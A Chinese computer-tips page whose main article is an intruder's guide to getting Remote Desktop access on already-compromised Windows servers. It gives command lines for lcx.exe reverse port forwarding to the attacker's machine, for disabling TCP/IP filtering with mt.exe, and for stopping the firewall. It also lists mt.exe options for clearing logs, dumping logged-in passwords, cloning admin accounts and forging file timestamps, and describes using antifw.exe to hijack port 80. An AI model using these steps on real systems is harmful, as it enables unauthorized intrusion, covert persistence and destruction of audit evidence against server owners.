欢迎登陆真网站,您的到来是我们的荣幸。 登陆 注册 忘记密码? ☆设为首页 △加入收藏
欢迎加入真幸福QQ群
电脑知识: 基础知识 网络技术 操作系统 办公软件 电脑维修 电脑安全 windows7 windows8 windows10 服务器教程 平板电脑 视频播放教程 网络应用 互联网 工具软件 浏览器教程 QQ技巧 输入法教程 影视制作 YY教程 wps教程 word教程 Excel教程 PowerPoint
云南西双版纳特产小花糯玉米真空包装
基础知识    更多
电脑知识    更多


常见的电脑病毒以及电脑病毒种类
为什么桌面上的回收站不见了,怎么找回回收站?
移动U盘运行Android系统制作教程
笔记本夏天如何散热效果好?
笔记本电脑夏季清除灰尘详细图文教程
笔记本电脑风扇清理灰尘教程! 让本本清凉一夏!
笔记本触摸板失灵情况的全面解析及解决方法
程序无法响应怎么办,自动关闭无法响应程序
用SubRip将sub字幕转成srt格式的方法
蓝屏代码0x000000d1是什么意思?
开了3389后WEB渗透远程连接不上的分析与解决
【 来源:网络 】【 点击:1 】 【 发布时间:2017_03_03 08:59:59 】

  对于开了3389,连接不上,有几个方面的原因,我来总结下,哇咔咔,这几天提好几台服务器都TM这样,分析下,

  原因1、远程桌面端口被更改。2、对方服务器处于内网。3、防火墙拦截。4、TCP/IP安全限制。

  好了,知道原因了,我们来一个一个思考解决方法(部分引用):

  远程桌面端口被更改解决方法:

  现在一般的asp大马都有探测服务器的功能,在权限还行的情况下都可以直接查看远程(TerminalService)端口,或者可以查看注册表也可以得到远程桌面端口,asp权限不行,在支持aspx的时候就换aspx查看注册表。

  对方服务器处于内网解决方法:

  这种情况我们可以使用lcx做端口转发,不知道的或者没有的就百度“lcx。exe下载”,我就不提供下载了。

  使用方法:

  1。上传lcx。exe到目标服务器可执行目录

  2。本地主机启动lcx。exe监听,命令:

  lcx。exe-listen19884567//监听1988端口并转发到4567端口

  在目标主机运行:

  格式为:

  lcx。exe-slave你的IP你监听的端口肉机IP要转发的目标主机端口

  例子:lcx。exe-slave192。168。86。11988192。168。86。33389

  3。本地链接:127。0。0。1:1988

  OK,有点小麻烦,不过还是很管用的,要是你也是内网,你就做下端口映射就好了,映射到转发回来的端口,哇咔咔。

  4、防火墙拦截解决办法:

  一般还是先试试端口转发,还是利用LCX,

  使用方法:

  lcx。exe-slave你的IP你监听的端口肉机要转发的目标主机端口

  例子:lcx。exe-slave192。168。86。11988192。168。86。33389

  然后本地连接:127。0。0。1:1988就搞定了。

  如果还不行。。要是web是SYSTEM权限,直接停掉防火墙服务就没问题了。

  5、TCP/IP安全策略限制。

  这个解决方法就有点多了,可以使用MT。EXE来关闭策略,

  使用方法:

  1。上传mt。exe到目标服务器可执行目录

  2。执行命令:mt。exe-filteroff

  这样就关闭了TCP/IP限制了

  选项:

  -filter—更改TCP/IP过滤器的开头状态

  -addport—添加端口到过滤器的允许列表

  -setport—设置端口作为过滤器的允许列表

  -nicinfo—列出TCP/IP界面信息

  -pslist—列出活动进程

  -pskill—杀毒指定进程

  -dlllist—列出指定进程的DLL

  -sysinfo—列出系统信息

  -shutdown—关闭系统

  -reboot—重启系统

  -poweroff—关闭电源

  -logoff—注销当前用户会话

  -chkts—检查终端服务信息

  -setupts—安装终端服务

  -remts—卸载终端服务

  -chgtsp—重置终端服务端口

  -clog—清除系统日志

  -enumsrv—列出所有服务

  -querysrv—列出指定服务的详细信息

  -instsrv—安装一个服务

  -cfgsrv—更改服务配置

  -remsrv—卸载指定服务

  -startsrv—启动指定服务

  -stopsrv—停止指定服务

  -netget—从http/ftp下载

  -redirect—端口重定向

  -chkuser—列出所有账户、sid和anti克隆

  -clone—克隆admin到目标

  -never—设置账户看上去从未登录

  -killuser—删除账户,甚至是“guest”也可删除

  -su—以Local_System权限运行进程

  -findpass—显示所有已登录用户的口令

  -netstat—列出TCP连接

  -killtcp—杀死TCP连接

  -psport—映射端口到进程

  -touch—设置文件日期和时间到指定值

  -secdel—安全擦除文件或目录占用的空间

  -regshell—进入一个控制台注册表编辑器

  -chkdll—检测ginadll后门

  上面只是一种方法,再说一种好用的方法吧,成功率灰常高,哇咔咔。

  使用antifw。exe这个工具,

  使用方法:

  在cmd下输入

  antifw-s运行程序停止iis将3389改为80

  antifw-l关闭程序。恢复iis

  连接的时候直接连接他的80端口就OK了,内网外网通杀!成功率比较高。但是这样他网站就访问不了。。。

  没事,上去了我们赶紧分析原因,排除万难,把限制去掉,再给他还原80端口,哇咔咔。。。

友情连接:千岛家园
本网站由川南居提供技术支持,fkzxf版权所有 浙ICP备12031891号